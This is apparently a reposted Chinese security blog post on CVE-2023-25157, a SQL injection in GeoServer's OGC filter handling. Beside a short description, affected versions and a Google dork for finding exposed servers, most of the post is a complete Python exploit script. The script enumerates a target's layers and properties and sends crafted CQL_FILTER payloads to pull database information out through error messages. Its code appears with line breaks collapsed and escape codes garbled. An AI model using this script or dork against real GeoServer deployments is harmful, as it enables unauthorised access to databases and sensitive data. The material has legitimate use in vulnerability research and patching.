产品简介
GeoServer是一款开源的地理数据服务器软件,主要用于发布、共享和处理各种地理空间数据。它支持众多的地图和空间数据标准,能够使各种设备通过网络来浏览和使用这些地理信息数据。
漏洞概述
GeoServer在预览图层的时候,可以对图层进行数据过滤从而渲染出指定位置的图层。由于未对用户输入进行过滤,在使用需要以数据库作为数据存储的功能时,攻击者可以构造畸形的过滤语法,绕过GeoServer的词法解析从而造成SQL注入,获取服务器中的敏感信息,甚至可能获取数据库服务器权限。
影响范围
GeoServer < 2.21.42.22.0 <= GeoServer < 2.22.2
使用外置数据库创建自定义图层
Google Dork
inurl:"/geoserver/ows?service=wfs"
POC
#!/usr/bin/env python3# -*- coding: utf-8 -*-"""Title: GeoServer OGC Filter SQL Injection VulnerabilitiesCVE: CVE-2023-25157Script Author: Bipin Jitiya (@win3zz)Date: 06/06/2023Google Dork: inurl:"/geoserver/ows?service=wfs"Vendor/Software: https://github.com/geoserver/geoserverScript Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10References:1. https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf2. https://github.com/geoserver/geoserver/commit/145a8af798590288d270b240235e89c8f0b62e1d3. https://twitter.com/parzel2/status/1665726454489915395"""import requestsimport sysimport xml.etree.ElementTree as ETimport json# Colored output codesGREEN = '�33[92m'YELLOW = '�33[93m'RED = '�33[91m'BOLD = '�33[1m'ENDC = '�33[0m'# Check if the script is run without parametersif len(sys.argv) == 1:print(f"{YELLOW}This script requires a URL parameter.{ENDC}")print(f"{YELLOW}Usage: python3 {sys.argv[0]} <URL>{ENDC}")sys.exit(1)# URL and proxy settingsURL = sys.argv[1]PROXY_ENABLED = FalsePROXY = "http://127.0.0.1:8080/" if PROXY_ENABLED else Noneresponse = requests.get(URL + "/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities", proxies={"http": PROXY}, verify=False)if response.status_code == 200:# Parse the XML response and extract the Name from each FeatureType and store in a listroot = ET.fromstring(response.text)feature_types = root.findall('.//{http://www.opengis.net/wfs}FeatureType')names = [feature_type.findtext('{http://www.opengis.net/wfs}Name') for feature_type in feature_types]# Print the feature namesprint(f"{GREEN}Available feature names:{ENDC}")for name in names:print(f"- {name}")# Send requests for each feature name and CQL_FILTER typecql_filters = ["strStartsWith"] # We can also exploit other filter/functions like "PropertyIsLike", "strEndsWith", "strStartsWith", "FeatureId", "jsonArrayContains", "DWithin" etc.for name in names:for cql_filter in cql_filters:endpoint = f"/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName={name}&maxFeatures=1&outputFormat=json"response = requests.get(URL + endpoint, proxies={"http": PROXY}, verify=False)if response.status_code == 200:json_data = json.loads(response.text)properties = json_data['features'][0]['properties']property_names = list(properties.keys())print(f"n{GREEN}Available Properties for {name}:{ENDC}")for property_name in property_names:print(f"- {property_name}")print(f"n{YELLOW}Sending requests for each property name:{ENDC}")for property_name in property_names:endpoint = f"/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName={name}&CQL_FILTER={cql_filter}%28{property_name}%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true"response = requests.get(URL + endpoint, proxies={"http": PROXY}, verify=False)print(f"[+] Sending request for {BOLD}{name}{ENDC} with Property {BOLD}{property_name}{ENDC} and CQL_FILTER: {BOLD}{cql_filter}{ENDC}")if response.status_code == 200:root = ET.fromstring(response.text)error_message = root.findtext('.//{http://www.opengis.net/ogc}ServiceException')print(f"{GREEN}{error_message}{ENDC}")else:print(f"{RED}Request failed{ENDC}")else:print(f"{RED}Request failed{ENDC}")else:print(f"{RED}Failed to retrieve XML data{ENDC}")
使用方法
python3 XX.py <URL>
此处有一个漫长的等待环节!!!
参考链接
https://blog.csdn.net/qq_41904294/article/details/131117123https://github.com/win3zz/CVE-2023-25157
原文始发于微信公众号(巢安实验室):GeoServer SQL Injection
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论